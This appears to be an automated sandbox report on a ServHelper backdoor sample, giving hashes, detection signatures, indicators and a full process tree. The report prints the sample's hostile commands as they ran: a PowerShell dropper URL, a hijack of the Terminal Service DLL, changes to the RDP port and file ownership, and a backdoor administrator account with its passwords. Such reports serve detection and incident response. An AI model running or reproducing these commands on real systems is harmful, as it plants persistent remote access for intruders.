servhelper | 67731976f3ca148c7983dadef66659256d18766ba4f956a40ed3abcf2619ae98

Analysis

max time kernel
113s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
19-04-2022 06:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

67731976f3ca148c7983dadef66659256d18766ba4f956a40ed3abcf2619ae98.exe
Size

3.4MB
MD5

512608823063f8b9568f67eb89337856
SHA1

57d0fb5026bbc365789b3999a8c35c7a6f79bbff
SHA256

67731976f3ca148c7983dadef66659256d18766ba4f956a40ed3abcf2619ae98
SHA512

ecc7e4783a01f50fa6d7b7415d53d0c75f12c7c979d876f52739a9fbc9b784fb7ae4852a9098956e2c82d7f019c4815e7d8f0d2afcd728e708ae42de557f11fb

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 10 IoCs

flow	pid	Process
26	1244	powershell.exe
28	1244	powershell.exe
29	1244	powershell.exe
31	1244	powershell.exe
32	1244	powershell.exe
34	1244	powershell.exe
36	1244	powershell.exe
38	1244	powershell.exe
40	1244	powershell.exe
42	1244	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076

Possible privilege escalation attempt 8 IoCs

exploit

pid	Process
3036	icacls.exe
4192	takeown.exe
3976	icacls.exe
768	icacls.exe
4816	icacls.exe
4728	icacls.exe
312	icacls.exe
32	icacls.exe

Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000c000000023159-169.dat	upx
behavioral2/files/0x000800000002315d-170.dat	upx

Loads dropped DLL 2 IoCs

pid	Process
1084	Process not Found
1084	Process not Found

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4816	icacls.exe
4728	icacls.exe
312	icacls.exe
32	icacls.exe
3036	icacls.exe
4192	takeown.exe
3976	icacls.exe
768	icacls.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe

Drops file in Windows directory 18 IoCs

description	ioc	Process
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_crvuxmsc.uvy.ps1	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_djomriyr.zj2.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI355B.tmp	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI351B.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI359B.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI34AC.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI352B.tmp	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4276	2812	WerFault.exe	79

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
392	reg.exe

Runs net.exe

Script User-Agent 5 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc	stream
HTTP User-Agent header	28	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	29	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1
HTTP User-Agent header	31	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	32	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1
HTTP User-Agent header	34	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
1244	powershell.exe
1244	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
664	Process not Found
664	Process not Found

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	3692	powershell.exe
Token: SeRestorePrivilege	768	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	4168	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4168	WMIC.exe
Token: SeAuditPrivilege	4168	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4168	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4168	WMIC.exe
Token: SeAuditPrivilege	4168	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1872	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1872	WMIC.exe
Token: SeAuditPrivilege	1872	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1872	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1872	WMIC.exe
Token: SeAuditPrivilege	1872	WMIC.exe
Token: SeDebugPrivilege	1244	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2812 wrote to memory of 3692	2812	67731976f3ca148c7983dadef66659256d18766ba4f956a40ed3abcf2619ae98.exe	80
PID 2812 wrote to memory of 3692	2812	67731976f3ca148c7983dadef66659256d18766ba4f956a40ed3abcf2619ae98.exe	80
PID 3692 wrote to memory of 4504	3692	powershell.exe	85
PID 3692 wrote to memory of 4504	3692	powershell.exe	85
PID 4504 wrote to memory of 1964	4504	csc.exe	86
PID 4504 wrote to memory of 1964	4504	csc.exe	86
PID 3692 wrote to memory of 4192	3692	powershell.exe	88
PID 3692 wrote to memory of 4192	3692	powershell.exe	88
PID 3692 wrote to memory of 3976	3692	powershell.exe	89
PID 3692 wrote to memory of 3976	3692	powershell.exe	89
PID 3692 wrote to memory of 768	3692	powershell.exe	90
PID 3692 wrote to memory of 768	3692	powershell.exe	90
PID 3692 wrote to memory of 4816	3692	powershell.exe	91
PID 3692 wrote to memory of 4816	3692	powershell.exe	91
PID 3692 wrote to memory of 4728	3692	powershell.exe	92
PID 3692 wrote to memory of 4728	3692	powershell.exe	92
PID 3692 wrote to memory of 312	3692	powershell.exe	93
PID 3692 wrote to memory of 312	3692	powershell.exe	93
PID 3692 wrote to memory of 32	3692	powershell.exe	94
PID 3692 wrote to memory of 32	3692	powershell.exe	94
PID 3692 wrote to memory of 3036	3692	powershell.exe	95
PID 3692 wrote to memory of 3036	3692	powershell.exe	95
PID 3692 wrote to memory of 3732	3692	powershell.exe	96
PID 3692 wrote to memory of 3732	3692	powershell.exe	96
PID 3692 wrote to memory of 392	3692	powershell.exe	97
PID 3692 wrote to memory of 392	3692	powershell.exe	97
PID 3692 wrote to memory of 704	3692	powershell.exe	98
PID 3692 wrote to memory of 704	3692	powershell.exe	98
PID 3692 wrote to memory of 2108	3692	powershell.exe	99
PID 3692 wrote to memory of 2108	3692	powershell.exe	99
PID 2108 wrote to memory of 2576	2108	net.exe	100
PID 2108 wrote to memory of 2576	2108	net.exe	100
PID 3692 wrote to memory of 3512	3692	powershell.exe	101
PID 3692 wrote to memory of 3512	3692	powershell.exe	101
PID 3512 wrote to memory of 3564	3512	cmd.exe	102
PID 3512 wrote to memory of 3564	3512	cmd.exe	102
PID 3564 wrote to memory of 660	3564	cmd.exe	103
PID 3564 wrote to memory of 660	3564	cmd.exe	103
PID 660 wrote to memory of 3516	660	net.exe	104
PID 660 wrote to memory of 3516	660	net.exe	104
PID 3692 wrote to memory of 3852	3692	powershell.exe	106
PID 3692 wrote to memory of 3852	3692	powershell.exe	106
PID 3852 wrote to memory of 1408	3852	cmd.exe	107
PID 3852 wrote to memory of 1408	3852	cmd.exe	107
PID 1408 wrote to memory of 4348	1408	cmd.exe	108
PID 1408 wrote to memory of 4348	1408	cmd.exe	108
PID 4348 wrote to memory of 2188	4348	net.exe	109
PID 4348 wrote to memory of 2188	4348	net.exe	109
PID 5060 wrote to memory of 3348	5060	cmd.exe	113
PID 5060 wrote to memory of 3348	5060	cmd.exe	113
PID 3348 wrote to memory of 1780	3348	net.exe	114
PID 3348 wrote to memory of 1780	3348	net.exe	114
PID 3228 wrote to memory of 1236	3228	cmd.exe	117
PID 3228 wrote to memory of 1236	3228	cmd.exe	117
PID 1236 wrote to memory of 4720	1236	net.exe	118
PID 1236 wrote to memory of 4720	1236	net.exe	118
PID 3384 wrote to memory of 4896	3384	cmd.exe	121
PID 3384 wrote to memory of 4896	3384	cmd.exe	121
PID 4896 wrote to memory of 1520	4896	net.exe	122
PID 4896 wrote to memory of 1520	4896	net.exe	122
PID 2872 wrote to memory of 2324	2872	cmd.exe	125
PID 2872 wrote to memory of 2324	2872	cmd.exe	125
PID 2324 wrote to memory of 1464	2324	net.exe	126
PID 2324 wrote to memory of 1464	2324	net.exe	126

C:\Users\Admin\AppData\Local\Temp\67731976f3ca148c7983dadef66659256d18766ba4f956a40ed3abcf2619ae98.exe
"C:\Users\Admin\AppData\Local\Temp\67731976f3ca148c7983dadef66659256d18766ba4f956a40ed3abcf2619ae98.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2812
- \??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
  -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3692
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mwfootvj\mwfootvj.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4504
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8988.tmp" "c:\Users\Admin\AppData\Local\Temp\mwfootvj\CSC7E0D290D1CA4F319B97FAC1981DE798.TMP"
      4⤵
      PID:1964
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4192
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3976
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:768
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4816
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4728
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:312
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:32
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3036
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:3732
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:392
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:704
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2108
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:2576
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3512
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3564
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:660
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:3516
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3852
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1408
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4348
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:2188
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:4140
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:2056
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2812 -s 480
  2⤵
  - Program crash
  PID:4276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2812 -ip 2812
1⤵
PID:8

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:5060
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Ghar4f5 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3348
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
    3⤵
    PID:1780

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Qz8dBFio /add
1⤵
- Suspicious use of WriteProcessMemory
PID:3228
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Qz8dBFio /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1236
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Qz8dBFio /add
    3⤵
    PID:4720

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3384
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4896
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    3⤵
    PID:1520

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2872
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2324
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD
    3⤵
    PID:1464

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
PID:2608
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  2⤵
  PID:1092
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
    3⤵
    PID:1960

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Qz8dBFio
1⤵
PID:1656
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Qz8dBFio
  2⤵
  PID:3940
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Qz8dBFio
    3⤵
    PID:3336

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:1372
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
